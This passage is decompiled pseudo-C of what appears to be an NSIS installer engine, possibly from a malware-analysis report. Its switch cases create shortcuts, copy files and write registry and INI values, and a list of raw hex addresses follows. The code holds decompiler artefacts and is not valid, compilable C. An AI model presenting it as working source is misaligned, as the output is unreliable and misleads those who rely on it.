									__eax = E00401435(_v40);
									__eax =  *__esi();
									__eflags = __eax;
									if(__eax != 0) {
										_v8 = 1;
									}
								}
							}
							__eflags = _v36.dwLowDateTime - __ebx;
							if(_v36.dwLowDateTime == __ebx) {
								__eax = E00403CE4(_a4);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = FreeLibrary(_a4);
								}
							}
							goto L430;
						}
						__eax = GetModuleHandleW(__edi); // executed
						_a4 = __eax;
						__eflags = __eax;
						if(__eax != 0) {
							goto L231;
						}
						goto L230;
					case 0x2c:
						_v16 = E0040145C(__edx, 0xfffffff0);
						__edi = E0040145C(__edx, 0xffffffdf);
						_v12 = E0040145C(__edx, 2);
						_v20 = E0040145C(__edx, 0xffffffcd);
						_v96.hNameMappings = E0040145C(__edx, 0x45);
						__eax = E00405D51(__edi);
						__eflags = __eax;
						if(__eax == 0) {
							__eax = E0040145C(__edx, 0x21);
						}
						__eax = _v36.dwHighDateTime;
						__eax = __eax >> 0x10;
						_push(__eax >> 0x10);
						__eax = __eax >> 8;
						__esi = 0xff;
						__ecx = __eax >> 0x00000008 & 0x000000ff;
						_push(__eax >> 0x00000008 & 0x000000ff);
						_push(__eax);
						_push(_v20);
						_push(_v12);
						_push(__edi);
						__eax = E004062CF(L"CreateShortCut: out: \"%s\", in: \"%s %s\", icon: %s,%d, sw=%d, hk=%d", _v16);
						__eax =  &_a4;
						_push(__eax);
						_push(0x40ac10);
						_push(1);
						_push(__ebx);
						_push(0x40ac30);
						__imp__CoCreateInstance();
						__eflags = __eax - __ebx;
						if(__eax < __ebx) {
							L254:
							_push(0x4100f0);
							_v8 = 1;
							_push(0xfffffff0);
							goto L10;
						} else {
							__eax = _a4;
							__ecx =  *__eax;
							__edx =  &_v24;
							_push( &_v24);
							_push(0x40ac20);
							_push(__eax);
							__eax =  *( *__eax)();
							_v56 = __eax;
							__eflags = __eax - __ebx;
							if(__eax >= __ebx) {
								__eax = _a4;
								__ecx =  *__eax;
								_push(__edi);
								_push(__eax);
								_v56 = __eax;
								__eax = _a4;
								__ecx =  *__eax;
								_push(0x4d70b0);
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 0x24))();
								__ecx = _v36.dwHighDateTime;
								__ecx = __ecx >> 8;
								__eax = __ecx >> 0x00000008 & 0x000000ff;
								__eflags = __eax;
								if(__eax != 0) {
									__ecx = _a4;
									__edx =  *__ecx;
									_push(__eax);
									_push(__ecx);
									__eax =  *((intOrPtr*)( *__ecx + 0x3c))();
									__ecx = _v36.dwHighDateTime;
								}
								__eax = _a4;
								__edx =  *__eax;
								_push(__ecx);
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 0x34))();
								__eax = _v20;
								__eflags =  *__eax - __bx;
								if( *__eax != __bx) {
									__edi = _v36.dwHighDateTime;
									__ecx = _a4;
									__edx =  *__ecx;
									__edi = _v36.dwHighDateTime & __esi;
									__eflags = __edi;
									_push(__edi);
									_push(__eax);
									_push(__ecx);
									__eax =  *((intOrPtr*)( *__ecx + 0x44))();
								}
								__eax = _a4;
								_push(_v12);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 0x2c))();
								__eax = _a4;
								_push(_v96.hNameMappings);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 0x1c))();
								__eflags = _v56 - __ebx;
								if(_v56 >= __ebx) {
									__eax = _v24;
									__ecx =  *__eax;
									_push(1);
									_push(_v16);
									_push(__eax);
									_v56 = __eax;
								}
								__eax = _v24;
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 8))();
							}
							__eax = _a4;
							__ecx =  *__eax;
							_push(__eax);
							__eax =  *((intOrPtr*)( *__eax + 8))();
							__eflags = _v56 - __ebx;
							if(_v56 >= __ebx) {
								_push(0x4100f0);
								_push(0xfffffff4);
								L10:
								__eax = E00404F9E();
								goto L430;
							} else {
								goto L254;
							}
						}
					case 0x2d:
						__esi = E0040145C(__edx, 0);
						__edi = E0040145C(__edx, 0x11);
						__eax = E0040145C(__edx, 0x23);
						_push(__edi);
						_a4 = __eax;
						__eax = E004062CF(L"CopyFiles \"%s\"->\"%s\"", __esi);
						__eax = E00406301(__esi);
						__eflags = __eax;
						if(__eax != 0) {
							__eax = _v16;
							_v96.hwnd = _v16;
							_v96.wFunc = 2;
							__eax = lstrlenW(__esi);
							__ecx = 0;
							 *(__esi + 2 + __eax * 2) = __cx;
							__eax = lstrlenW(__edi);
							__ecx = 0;
							 *(__edi + 2 + __eax * 2) = __cx;
							__eax = _a4;
							__cx = _v40;
							_v96.pFrom = __esi;
							_v96.pTo.left = __edi;
							_v70 = _a4;
							_v96.fFlags = _v40;
							E00404F9E(0, _a4) =  &_v96;
							__eax = SHFileOperationW( &_v96);
							__eflags = __eax;
							if(__eax == 0) {
								goto L430;
							}
						}
						__eax = E00404F9E(0xfffffff9, __ebx);
						goto L67;
					case 0x2e:
						__eflags = __edx - 0xbadf00d;
						if(__edx != 0xbadf00d) {
							L166:
							_push(0x200010);
							_push(E00406831(__ebx, __edi, __esi, __ebx, 0xffffffe8));
							L98:
							__eax = E00405CCC();
							L5:
							__eax = 0x7fffffff;
							return 0x7fffffff;
						}
						 *0x47eb74 =  *0x47eb74 + 1;
						goto L430;
					case 0x2f:
						__esi = 0x4100f0;
						_v20 = 0;
						_v24 = 0;
						_a4 = 0;
						__eax = E00406035(0x4100f0, L"<RM>");
						__edi = 0x4140f8;
						__eax = E00406035(0x4140f8, 0x4100f0);
						__eflags = _v48;
						if(_v48 != 0) {
							_v20 = E0040145C(__edx, 0);
						}
						__eflags = _v44 - __ebx;
						if(_v44 != __ebx) {
							_v24 = E0040145C(__edx, 0x11);
						}
						__eflags = _v36.dwHighDateTime - __ebx;
						if(_v36.dwHighDateTime != __ebx) {
							_a4 = E0040145C(__edx, 0x22);
						}
						__ebx = E0040145C(__edx, 0xffffffcd);
						_push(__ebx);
						_push(__edi);
						_push(__esi);
						__eax = E004062CF(L"WriteINIStr: wrote [%s] %s=%s in %s", L"install");
						__eax = WritePrivateProfileStringW(_v20, _v24, _a4, __ebx);
						goto L65;
					case 0x30:
						__eax =  *L"!N~"; // 0x4e0021
						_v96.fAnyOperationsAborted = __eax;
						__eax =  *0x409590; // 0x7e
						_v96.hNameMappings = __eax;
						__edi = E0040145C(__edx, 1);
						__ebx = E0040145C(__edx, 0x12);
						E0040145C(__edx, 0xffffffdd) =  &(_v96.fAnyOperationsAborted);
						GetPrivateProfileStringW(__edi, __ebx,  &(_v96.fAnyOperationsAborted), __esi, 0x2003,  &(_v96.fAnyOperationsAborted)) =  &(_v96.fAnyOperationsAborted);
						__eax = lstrcmpW(__esi,  &(_v96.fAnyOperationsAborted));
						L62:
						__eflags = __eax;
						if(__eax != 0) {
							goto L430;
						}
						goto L63;
					case 0x31:
						_a4 = E004061EC(__ecx);
						__eflags = _v36.dwHighDateTime;
						if(_v36.dwHighDateTime != 0) {
							__eax = E0040145C(__edx, 0x22);
							__esi = __eax;
							_push(__eax);
							__eax = E004062CF(L"DeleteRegKey: \"%s\\%s\"", _a4);
							__eax = _v44;
							__eflags = __eax;
							if(__eax == 0) {
								 *0x47eb64 =  *0x47eb64 + 0x80000001;
								__eflags =  *0x47eb64 + 0x80000001;
							}
							_v36.dwHighDateTime = _v36.dwHighDateTime & 0x00000002;
							__eflags = _v36.dwHighDateTime & 0x00000002;
							_v24 = __eax;
							L276:
							__eflags = _v24 - __ebx;
							if(_v24 == __ebx) {
								goto L430;
							}
							goto L67;
						}
						__edi = E00401553(2);
						__eflags = __edi;
						if(__edi == 0) {
							goto L67;
						}
						__esi = E0040145C(__edx, 0x33);
						__eax = RegDeleteValueW(__edi, __esi);
						_push(__esi);
						_push(0x4140f8);
						_v24 = __eax;
						E004062CF(L"DeleteRegValue: \"%s\\%s\" \"%s\"", _a4) = RegCloseKey(__edi);
						goto L276;
					case 0x32:
						__eflags = __edx;
						if(__edx == 0) {
							__edi =  *0x47eb64;
							__edi =  *0x47eb64 + 0x80000001;
							__eflags = __edi;
						} else {
							__edi = __edx;
						}
						__eax = _v36.dwHighDateTime;
						_v20 = _v36.dwHighDateTime;
						__eax = _v28;
						_v24 = _v28;
						_v16 = E0040145C(__edx, 2);
						_a4 = E0040145C(__edx, 0x11);
						_v56 = E004061EC(__edi);
						 &(_v96.hNameMappings) =  *0x47eb90;
						__eax =  *0x47eb90 | 0x00000002;
						0 = 1;
						_v8 = 1;
						__eax = RegCreateKeyExW(__edi, _a4, __ebx, __ebx, __ebx,  *0x47eb90 | 0x00000002, __ebx,  &(_v96.hNameMappings), __ebx);
						__eflags = __eax;
						if(__eax != 0) {
							_push(_a4);
							_push(_v56);
							_push(L"WriteReg: error creating key \"%s\\%s\"");
							L87:
							__eax = E004062CF();
							L88:
							__esp = __esp + 0xc;
							goto L430;
						} else {
							_v12 = __ebx;
							__edi = 0x4140f8;
							__eflags = _v20 - 1;
							if(_v20 != 1) {
								L286:
								_push(4);
								_pop(__esi);
								__eflags = _v20 - __esi;
								if(_v20 == __esi) {
									_push(3);
									_pop(__ecx);
									__eax = E00401446(__ecx);
									_push(__eax);
									_push(_v16);
									 *0x4140f8 = __eax;
									_push(_a4);
									_v12 = __esi;
									__eax = E004062CF(L"WriteRegDWORD: \"%s\\%s\" \"%s\"=\"0x%08x\"", _v56);
								}
								__eflags = _v20 - 3;
								if(_v20 == 3) {
									_v12 = E0040337F(_v36.dwLowDateTime, __ebx, __edi, 0xc018);
									 &_v352 = E00406250(__ecx,  &_v352, 0x100, __edi,  &_v352);
									__eax =  &_v352;
									_push( &_v352);
									_push(_v16);
									_push(_a4);
									__eax = E004062CF(L"WriteRegBin: \"%s\\%s\" \"%s\"=\"%s\"", _v56);
								}
								L290:
								__eax = RegSetValueExW(_v96.hNameMappings, _v16, __ebx, _v24, __edi, _v12);
								__eflags = __eax;
								if(__eax != 0) {
									_push(_v16);
									_push(_a4);
									__eax = E004062CF(L"WriteReg: error writing into \"%s\\%s\" \"%s\"", _v56);
								} else {
									_v8 = __ebx;
								}
								_push(_v96.hNameMappings);
								goto L294;
							}
							__eax = E0040145C(__edx, 0x23);
							__eax = lstrlenW(0x4140f8);
							_push(0x4140f8);
							_push(_v16);
							__eax = __eax +  &(__eax[1]);
							_push(_a4);
							_v12 = __eax;
							_push(_v56);
							__eflags = _v24 - 1;
							if(_v24 != 1) {
								_push(L"WriteRegExpandStr: \"%s\\%s\" \"%s\"=\"%s\"");
								__eax = E004062CF();
								__esp = __esp + 0x14;
								goto L286;
							}
							_push(L"WriteRegStr: \"%s\\%s\" \"%s\"=\"%s\"");
							__eax = E004062CF();
							__esp = __esp + 0x14;
							goto L290;
						}
					case 0x33:
						__edi = E00401553(0x20019);
						__eax = E0040145C(__edx, 0x33);
						__ecx = 0;
						 *__esi = __cx;
						__eflags = __edi;
						if(__edi == 0) {
							goto L67;
						}
						 &(_v96.hNameMappings) =  &_a4;
						_v96.hNameMappings = 0x4008;
						__eax = RegQueryValueExW(__edi, __eax, 0,  &_a4, __esi,  &(_v96.hNameMappings));
						__ecx = 0;
						__ecx = 1;
						__eflags = __eax;
						if(__eax != 0) {
							L303:
							__eax = 0;
							__eflags = 0;
							 *__esi = __ax;
							_v8 = __ecx;
							goto L304;
						}
						__eflags = _a4 - 4;
						if(_a4 == 4) {
							__eax = 0;
							__eflags = _v36.dwHighDateTime;
							__eax = 0 | __eflags == 0x00000000;
							_v8 = __eflags == 0;
							__eax = E00405F7D(__esi,  *__esi);
							goto L304;
						}
						__eflags = _a4 - 1;
						if(_a4 == 1) {
							L301:
							__eax = _v36.dwHighDateTime;
							__ecx = _v96.hNameMappings;
							_v8 = _v36.dwHighDateTime;
							__eax = 0;
							__esi[_v96.hNameMappings] = __ax;
							goto L304;
						}
						__eflags = _a4 - 2;
						if(_a4 != 2) {
							goto L303;
						}
						goto L301;
					case 0x34:
						__eax = E00401553(0x20019);
						_push(3);
						_pop(__ecx);
						__edi = __eax;
						__eax = E00401446(__ecx);
						__ecx = 0;
						 *__esi = __cx;
						__eflags = __edi;
						if(__edi == 0) {
							goto L67;
						}
						__ecx = 0x2003;
						_a4 = 0x2003;
						__eflags = _v36.dwHighDateTime;
						if(_v36.dwHighDateTime == 0) {
							__ecx =  &_a4;
							__eax = RegEnumValueW(__edi, __eax, __esi,  &_a4, 0, 0, 0, 0);
							__eflags = __eax;
							if(__eax != 0) {
								goto L67;
							}
							L309:
							__eax = 0;
							__esi[0x2003] = __ax;
							L304:
							_push(__edi);
							L294:
							__eax = RegCloseKey();
							goto L430;
						}
						__eax = RegEnumKeyW(__edi, __eax, __esi, 0x2003);
						goto L309;
					case 0x35:
						__eflags =  *__esi - __bx;
						_push(ds);
						if(__eflags != 0) {
							_push(E00405F96(__ecx, __esi));
							L313:
							__eax = CloseHandle();
						}
						goto L430;
					case 0x36:
						__eax = E0040145C(__edx, 0xffffffed);
						__eax = E00405E7C(__eax, _v44, _v40);
						__eflags = __eax - 0xffffffff;
						if(__eax != 0xffffffff) {
							goto L427;
						}
						goto L315;
					case 0x37:
						__edi = 0x2004;
						_a4 = GlobalAlloc(0x40, 0x2004);
						__eflags = _v40;
						if(_v40 == 0) {
							E0040145C(__edx, 0x11) = WideCharToMultiByte(0, 0, 0x4100f0, 0xffffffff, _a4, 0x2004, 0, 0);
							__eax = lstrlenA(_a4);
						} else {
							__ecx = 0;
							__ecx = 1;
							__eax = E00401446(1);
							__ecx = _a4;
							 *_a4 = __al;
							0 = 1;
						}
						__eflags =  *__esi - __bx;
						if( *__esi == __bx) {
							L321:
							_v8 = 1;
							goto L219;
						} else {
							__ecx =  &(_v96.hNameMappings);
							__eax = E00405F96(__ecx, __esi);
							__eax = WriteFile(__eax, _a4, __eax, __ecx, __ebx);
							__eflags = __eax;
							if(__eax != 0) {
								L219:
								_push(_a4);
								L220:
								__eax = GlobalFree(); // executed
								goto L430;
							}
							goto L321;
						}
					case 0x38:
						_push(2);
						_pop(__ecx);
						__eax = E00401446(__ecx);
						_v12 = __eax;
						__eflags = __eax - 1;
						if(__eax < 1) {
							goto L430;
						}
						__ecx = 0x2003;
						__eflags = __eax - 0x2003;
						if(__eax > 0x2003) {
							_v12 = 0x2003;
						}
						__eflags =  *__esi - __bx;
						if( *__esi == __bx) {
							goto L345;
						} else {
							_v61 = __bl;
							_v96.hNameMappings = E00405F96(__ecx, __esi);
							__eflags = _v12 - __ebx;
							if(_v12 <= __ebx) {
								goto L345;
							}
							__esi = __ebx;
							while(1) {
								 &_v24 =  &_a7;
								__eax = ReadFile(_v96.hNameMappings,  &_a7, 1,  &_v24, __ebx);
								__eflags = __eax;
								if(__eax == 0) {
									goto L346;
								}
								__eflags = _v24 - 1;
								if(_v24 != 1) {
									goto L346;
								}
								__eflags = _v36.dwLowDateTime - __ebx;
								if(_v36.dwLowDateTime != __ebx) {
									__eax = _a7 & 0x000000ff;
									goto L337;
								}
								 &_v16 =  &_a7;
								__eax = MultiByteToWideChar(__ebx, __ebx,  &_a7, 1,  &_v16, 2);
								__al = _v61;
								__eflags = __al - 0xd;
								if(__al == 0xd) {
									L338:
									__eflags = __al - _a7;
									if(__al == _a7) {
										L343:
										_push(1);
										_push(__ebx);
										_push(0xffffffff);
										goto L344;
									}
									__eflags = _a7 - 0xd;
									if(_a7 == 0xd) {
										L341:
										__ax = _v16;
										goto L342;
									}
									__eflags = _a7 - 0xa;
									if(_a7 != 0xa) {
										goto L343;
									}
									goto L341;
								}
								__eflags = __al - 0xa;
								if(__al == 0xa) {
									goto L338;
								}
								__ax = _v16;
								 *(__edi + __esi * 2) = __ax;
								__al = _a7;
								__esi =  &(__esi[0]);
								_v61 = __al;
								__eflags = __al - __bl;
								if(__al == __bl) {
									goto L346;
								}
								__eflags = __esi - _v12;
								if(__esi < _v12) {
									continue;
								}
								goto L346;
							}
							goto L346;
						}
					case 0x39:
						__eflags = _v40;
						if(_v40 == 0) {
							__eax = E0040145C(__edx, 0x11);
							__eax = lstrlenW(__eax);
						} else {
							__ecx = 0;
							__ecx = 1;
							__eax = E00401446(1);
							 *0x4100f0 = __ax;
							__eax = 0;
							__eax = 1;
						}
						__eflags =  *__esi - __bx;
						if( *__esi == __bx) {
							goto L67;
						} else {
							__ecx =  &_a4;
							__eax = __eax + __eax;
							__eax = E00405F96(__ecx, __esi);
							__eax = WriteFile(__eax, 0x4100f0, __eax, __ecx, __ebx);
							L65:
							__eflags = __eax;
							goto L66;
						}
					case 0x3a:
						_push(2);
						_pop(__ecx);
						__eax = E00401446(__ecx);
						_v12 = __eax;
						__eflags = __eax - 1;
						if(__eax < 1) {
							goto L430;
						}
						__ecx = 0x2003;
						__eflags = __eax - 0x2003;
						if(__eax > 0x2003) {
							_v12 = 0x2003;
						}
						__eflags =  *__esi - __bx;
						if( *__esi == __bx) {
							L345:
							__esi = __ebx;
							goto L346;
						} else {
							_v56 = __ebx;
							_v96.hNameMappings = E00405F96(__ecx, __esi);
							__eflags = _v12 - __ebx;
							if(_v12 <= __ebx) {
								goto L345;
							}
							__esi = __ebx;
							while(1) {
								 &_v24 =  &_a4;
								__eax = ReadFile(_v96.hNameMappings,  &_a4, 2,  &_v24, __ebx);
								__eflags = __eax;
								if(__eax == 0) {
									break;
								}
								__eflags = _v24 - 2;
								if(_v24 != 2) {
									break;
								}
								__eflags = _v36.dwLowDateTime - __ebx;
								if(_v36.dwLowDateTime != __ebx) {
									__eax = _a4 & 0x0000ffff;
									L337:
									__eax = E00405F7D(__edi, __eax);
									goto L431;
								}
								__eflags = _v56 - 0xd;
								if(_v56 == 0xd) {
									L367:
									__ax = _a4;
									__eflags = _v56 - __ax;
									if(_v56 == __ax) {
										L370:
										_push(1);
										_push(__ebx);
										_push(0xfffffffe);
										L344:
										__eax = SetFilePointer(_v96.hNameMappings, ??, ??, ??);
										break;
									}
									__eflags = __ax - 0xd;
									if(__ax == 0xd) {
										L342:
										 *(__edi + __esi * 2) = __ax;
										__esi =  &(__esi[0]);
										break;
									}
									__eflags = __ax - 0xa;
									if(__ax == 0xa) {
										goto L342;
									}
									goto L370;
								}
								__eflags = _v56 - 0xa;
								if(_v56 == 0xa) {
									goto L367;
								}
								__ax = _a4;
								__ecx = __ax & 0x0000ffff;
								 *(__edi + __esi * 2) = __ax;
								__esi =  &(__esi[0]);
								_v56 = __ax & 0x0000ffff;
								__eflags = __ax - __bx;
								if(__ax == __bx) {
									break;
								}
								__eflags = __esi - _v12;
								if(__esi < _v12) {
									continue;
								}
								break;
							}
							L346:
							__eax = 0;
							 *(__edi + __esi * 2) = __ax;
							__eflags = __esi - __ebx;
							L66:
							if(__eflags != 0) {
								goto L430;
							}
							goto L67;
						}
					case 0x3b:
						__eflags =  *__esi - __bx;
						_push(ds);
						if(__eflags == 0) {
							goto L430;
						} else {
							_push(_v36.dwLowDateTime);
							_push(0);
							_push(2);
							_pop(__ecx);
							__eax = E00401446(__ecx);
							__eax = E00405F96(__ecx, __esi);
							__eax = SetFilePointer(__eax, __eax, ??, ??);
							__eflags = _v44;
							if(_v44 < 0) {
								goto L430;
							}
							goto L374;
						}
					case 0x3c:
						__eflags =  *__esi - __bx;
						_push(ds);
						if(__eflags != 0) {
							E00405F96(__ecx, __esi) = FindClose(__eax);
						}
						goto L430;
					case 0x3d:
						__eflags =  *__edi - __bx;
						if( *__edi == __bx) {
							L63:
							__eax = 0;
							_v8 = 1;
							 *__esi = __ax;
							goto L430;
						}
						__eax =  &_v944;
						__eax = E00405F96(__ecx, __edi);
						__eax = FindNextFileW(__eax,  &_v944);
						__eflags = __eax;
						if(__eax == 0) {
							goto L63;
						}
						goto L385;
					case 0x3e:
						__eax = E0040145C(__edx, 2);
						__ecx =  &_v944;
						__eax = FindFirstFileW(__eax,  &_v944);
						__eflags = __eax - 0xffffffff;
						if(__eax != 0xffffffff) {
							__eax = E00405F7D(__edi, __eax);
							L385:
							__eax =  &(_v944.cFileName);
							_push( &(_v944.cFileName));
							_push(__esi);
							goto L386;
						}
						__eax = 0;
						 *__edi = __ax;
						L315:
						__eax = 0;
						 *__esi = __ax;
						goto L67;
					case 0x3f:
						_v20 = 0xfffffd66;
						__eax = E0040145C(__edx, 0xfffffff0);
						__esi = __eax;
						_v24 = __eax;
						__eax = E00405D51(__eax);
						__eflags = __eax;
						if(__eax == 0) {
							__eax = E0040145C(__edx, 0xffffffed);
						}
						__eax = E00405E5C(__esi);
						__eax = E00405E7C(__esi, 0x40000000, 2);
						_a4 = __eax;
						__eflags = __eax - 0xffffffff;
						if(__eax == 0xffffffff) {
							L398:
							_push(_v24);
							__eax = E004062CF(L"created uninstaller: %d, \"%s\"", _v20);
							_push(0xfffffff3);
							_pop(__esi);
							__eflags = _v20 - __ebx;
							if(_v20 < __ebx) {
								_push(0xffffffef);
								_pop(__esi);
								__eax = DeleteFileW(_v24);
								_v8 = 1;
							}
							__eax = E00401435(__esi);
							goto L430;
						} else {
							__eax =  *0x47eb0c;
							__esi = GlobalAlloc;
							_v96.hNameMappings = __eax;
							__edi = __eax;
							__eflags = __edi - __ebx;
							if(__edi == __ebx) {
								L397:
								__eax = CloseHandle(_a4);
								goto L398;
							}
							E00403368(__ebx) = E00403336(__edi, _v96.hNameMappings);
							0 = GlobalAlloc(0x40, _v40);
							_v20 = __esi;
							__eflags = __esi - __ebx;
							if(__esi == __ebx) {
								L396:
								 &_v12 = WriteFile(_a4, __edi, _v96.hNameMappings,  &_v12, __ebx);
								__eax = GlobalFree(__edi);
								_v20 = E0040337F(0xffffffff, _a4, __ebx, __ebx);
								goto L397;
							}
							__eax = E0040337F(_v44, __ebx, __esi, _v40);
							while(1) {
								__eflags =  *__esi - __bl;
								if( *__esi == __bl) {
									break;
								}
								__ecx =  *__esi;
								__eax = __esi[2];
								__esi =  &(__esi[4]);
								__eax = __eax + __edi;
								_v60 = __ecx;
								__eax = E00405E38(__eax, __esi, __ecx);
								__esi = __esi + _v60;
								__eflags = __esi;
							}
							__eax = GlobalFree(_v20);
							goto L396;
						}
					case 0x40:
						__eflags = __edx;
						if(__edx == 0) {
							_push(E0040145C(__edx, 1));
							_push(L"%s");
							L52:
							__eax = E004062CF();
							_pop(__ecx);
							L27:
							_pop(__ecx);
							goto L430;
						}
						E004062CF(L"settings logging to %d", __ecx) = _v44;
						 *0x46d204 = _v44;
						__eax = E004062CF(L"logging set to %d", _v44);
						__eflags = _v44;
						if(_v44 == 0) {
							__eax = E00406113(__ecx, 1);
						} else {
							__eax = E00403EA0();
						}
						goto L430;
					case 0x41:
						__ecx = 0;
						__eax = E00401446(0);
						_a4 = __eax;
						__eflags = __eax -  *0x47eacc;
						if(__eax >=  *0x47eacc) {
							goto L67;
						}
						__esi = __eax;
						__eax = _v40;
						__esi = __esi * 0x4020;
						__esi = __esi +  *0x47eac8;
						__eflags = __eax;
						if(__eflags < 0) {
							0xffffffff = 0xffffffff - __eax;
							__eflags = 0xffffffff;
							_v40 = 0xffffffff - __eax;
							if(0xffffffff == 0) {
								_t480 =  &(__esi[0xc]); // -4713136
								_t480 = E00406831(__ebx, __edi, 0, _t480, _v36.dwHighDateTime);
								_t481 =  &(__esi[4]);
								 *_t481 = __esi[4] | 0x00000100;
								__eflags =  *_t481;
							} else {
								__ecx = 0;
								__ecx = 1;
								_v44 = E00401446(1);
							}
							__eax = _v40;
							__ecx = _v44;
							 *((intOrPtr*)(__esi + _v40 * 4)) = _v44;
							__eflags = _v36.dwLowDateTime - __ebx;
							if(_v36.dwLowDateTime != __ebx) {
								__eax = E00401186(_a4);
							}
							goto L430;
						}
						__ecx =  *(__esi + __eax * 4);
						if(__eflags != 0) {
							_push(__ecx);
							goto L375;
						}
						_push(0);
						_push(__edi);
						L386:
						__eax = E00406035();
						goto L430;
					case 0x42:
						__ecx = 0;
						__eax = E00401446(0);
						__eflags = __eax - 0x20;
						if(__eax >= 0x20) {
							L67:
							_v8 = 1;
							goto L430;
						}
						__eflags = _v36.dwLowDateTime;
						if(_v36.dwLowDateTime == 0) {
							__eflags = _v40;
							if(_v40 == 0) {
								__ecx =  *0x47eabc;
								__eax = E00406831(__ebx, __edi, __esi, __edi,  *( *0x47eabc + 0x94 + __eax * 4));
							} else {
								__ecx = _v44;
								__edx =  *0x47eabc;
								 *( *0x47eabc + 0x94 + __eax * 4) = _v44;
							}
							goto L430;
						}
						__eflags = _v40;
						if(_v40 == 0) {
							__eax = E004012F1(0);
							L374:
							_push(__eax);
							L375:
							_push(__edi);
							goto L429;
						}
						__eax = E004011F8(__ecx, 0, 0);
						goto L430;
					case 0x43:
						goto L430;
					case 0x44:
						 *0x461dcc =  *0x461dcc & __edx;
						__eax = SendMessageW(_v16, 0xb,  *0x461dcc & __edx, 0);
						__eflags = _v48;
						if(_v48 != 0) {
							__eax = InvalidateRect(_v16, 0, 0);
						}
						goto L430;
					case 0x45:
						__eax = E0040145C(__edx, 1);
						__eax = E004063D8(__eax);
						L427:
						_push(__eax);
						L428:
						_push(__esi);
						L429:
						__eax = E00405F7D();
						goto L430;
				}
			}

























                                                                                                                                                    0x004015b6
                                                                                                                                                    0x004015ba
                                                                                                                                                    0x004015bc
                                                                                                                                                    0x004015d2
                                                                                                                                                    0x004015e1
                                                                                                                                                    0x004015eb
                                                                                                                                                    0x004015ee
                                                                                                                                                    0x004015f4
                                                                                                                                                    0x004030e3
                                                                                                                                                    0x004030e6
                                                                                                                                                    0x004030ec
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004030ec
                                                                                                                                                    0x004015fa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401607
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401622
                                                                                                                                                    0x00401627
                                                                                                                                                    0x00401628
                                                                                                                                                    0x00401629
                                                                                                                                                    0x0040162a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040163c
                                                                                                                                                    0x00401642
                                                                                                                                                    0x00401645
                                                                                                                                                    0x00401648
                                                                                                                                                    0x00401648
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401656
                                                                                                                                                    0x00401656
                                                                                                                                                    0x0040165f
                                                                                                                                                    0x00401664
                                                                                                                                                    0x00401665
                                                                                                                                                    0x00401666
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040167e
                                                                                                                                                    0x00401683
                                                                                                                                                    0x00401684
                                                                                                                                                    0x00401685
                                                                                                                                                    0x00401686
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401693
                                                                                                                                                    0x0040169a
                                                                                                                                                    0x004016a2
                                                                                                                                                    0x004016a7
                                                                                                                                                    0x004016a8
                                                                                                                                                    0x004016a9
                                                                                                                                                    0x004016ac
                                                                                                                                                    0x004016ae
                                                                                                                                                    0x004016b0
                                                                                                                                                    0x004016b0
                                                                                                                                                    0x004016b0
                                                                                                                                                    0x004016b2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004016bd
                                                                                                                                                    0x004016c2
                                                                                                                                                    0x004016c7
                                                                                                                                                    0x004016cb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401742
                                                                                                                                                    0x00401747
                                                                                                                                                    0x0040174d
                                                                                                                                                    0x0040174f
                                                                                                                                                    0x00401753
                                                                                                                                                    0x00401755
                                                                                                                                                    0x00401755
                                                                                                                                                    0x00401758
                                                                                                                                                    0x0040175d
                                                                                                                                                    0x0040175f
                                                                                                                                                    0x00401767
                                                                                                                                                    0x00401767
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401770
                                                                                                                                                    0x00401775
                                                                                                                                                    0x00401778
                                                                                                                                                    0x00401780
                                                                                                                                                    0x0040178c
                                                                                                                                                    0x00401792
                                                                                                                                                    0x00401794
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040179a
                                                                                                                                                    0x0040179a
                                                                                                                                                    0x004017a1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004017a1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004017b3
                                                                                                                                                    0x004017b8
                                                                                                                                                    0x004017bb
                                                                                                                                                    0x004017c4
                                                                                                                                                    0x004017d4
                                                                                                                                                    0x004017d6
                                                                                                                                                    0x004017d8
                                                                                                                                                    0x00401864
                                                                                                                                                    0x00401864
                                                                                                                                                    0x00401869
                                                                                                                                                    0x0040186c
                                                                                                                                                    0x00401890
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040186e
                                                                                                                                                    0x0040186e
                                                                                                                                                    0x0040187d
                                                                                                                                                    0x00401885
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401885
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004017de
                                                                                                                                                    0x004017de
                                                                                                                                                    0x004017e6
                                                                                                                                                    0x004017e8
                                                                                                                                                    0x004017ef
                                                                                                                                                    0x004017f1
                                                                                                                                                    0x004017f4
                                                                                                                                                    0x004017fa
                                                                                                                                                    0x004017fc
                                                                                                                                                    0x0040184e
                                                                                                                                                    0x00401853
                                                                                                                                                    0x00401853
                                                                                                                                                    0x00401854
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401854
                                                                                                                                                    0x004017fe
                                                                                                                                                    0x00401804
                                                                                                                                                    0x00401809
                                                                                                                                                    0x0040182a
                                                                                                                                                    0x00401830
                                                                                                                                                    0x00401832
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401834
                                                                                                                                                    0x0040183c
                                                                                                                                                    0x00401841
                                                                                                                                                    0x00000000
